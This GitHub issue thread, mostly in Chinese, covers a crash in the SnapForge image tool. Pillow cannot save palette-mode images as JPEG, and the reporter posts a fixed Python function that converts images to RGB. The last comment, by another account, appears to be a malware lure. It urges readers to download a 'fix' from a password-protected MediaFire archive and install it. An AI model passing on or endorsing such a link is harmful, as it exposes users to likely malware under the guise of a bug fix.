### ISSUE TITLE
重命名和更改图片格式转换闪退

### ISSUE THREAD

**Issue by riceshowerX** [riceshowerX/SnapForge#1]
Traceback (most recent call last):
  File "PIL\JpegImagePlugin.py", line 639, in _save
KeyError: 'P'

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "ui.py", line 106, in start_renaming
  File "logic.py", line 27, in batch_rename
  File "PIL\Image.py", line 2568, in save
  File "PIL\JpegImagePlugin.py", line 642, in _save
OSError: cannot write mode P as JPEG

**Comment by riceshowerX** [comment]
在尝试将图像以 JPEG 格式保存时，图像模式为 P（调色板模式），而 JPEG 格式不支持这种模式。JPEG 格式只支持 RGB、L（灰度）模式。因此，在保存为 JPEG 格式之前，你需要将图像转换为 RGB 模式

**Comment by riceshowerX** [comment]
修改 batch_rename 函数
你可以在 batch_rename 函数中添加一个检查，确保在保存图像之前将其转换为 RGB 模式。以下是修正后的 batch_rename 函数：

python
复制代码
from PIL import Image

def batch_rename(directory, prefix, start_number=1, extension=".jpg", convert_format=None):
    extension = extension.lower()
    count = start_number
    for filename in os.listdir(directory):
        if filename.lower().endswith(extension):
            src = os.path.join(directory, filename)
            
            new_extension = convert_format.lower() if convert_format else extension
            if not new_extension.startswith("."):
                new_extension = f".{new_extension}"

            dst = os.path.join(directory, f"{prefix}_{count}{new_extension}")

            while os.path.exists(dst):
                count += 1
                dst = os.path.join(directory, f"{prefix}_{count}{new_extension}")

            if convert_format:
                with Image.open(src) as img:
                    # Convert image to RGB mode if necessary
                    if img.mode in ("P", "RGBA"):
                        img = img.convert("RGB")
                    img.save(dst)
                try:
                    os.remove(src)
                except PermissionError:
                    print(f"无法删除文件 {src}，权限不足或文件被占用。")
            else:
                os.rename(src, dst)
            
            count += 1

    return count - start_number
修改 start_renaming 函数中的异常处理
如果希望在 start_renaming 函数中捕获并处理这种情况，可以添加更多的异常处理：

python
复制代码
def start_renaming(self):
    directory = self.directory_input.text()
    prefix = self.prefix_input.text()
    start_number = int(self.start_number_input.text())
    extension = self.extension_input.text()
    convert_format = self.convert_format_input.text() if self.convert_format_checkbox.isChecked() else None

    if not os.path.isdir(directory):
        QMessageBox.critical(self, "错误", "目录路径无效。")
        return

    if not prefix:
        QMessageBox.critical(self, "错误", "文件名前缀不能为空。")
        return

    try:
        renamed_count = batch_rename(directory, prefix, start_number, extension, convert_format)
        self.result_label.setText(f"已成功重命名并转换 {renamed_count} 个文件！")
    except Exception as e:
        QMessageBox.critical(self, "错误", f"处理过程中发生错误：{str(e)}")
总结
确保图像在保存之前被转换为 RGB 模式（特别是当你保存为 JPEG 格式时）。
捕获和处理可能发生的异常，以便提供友好的错误消息给用户。

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
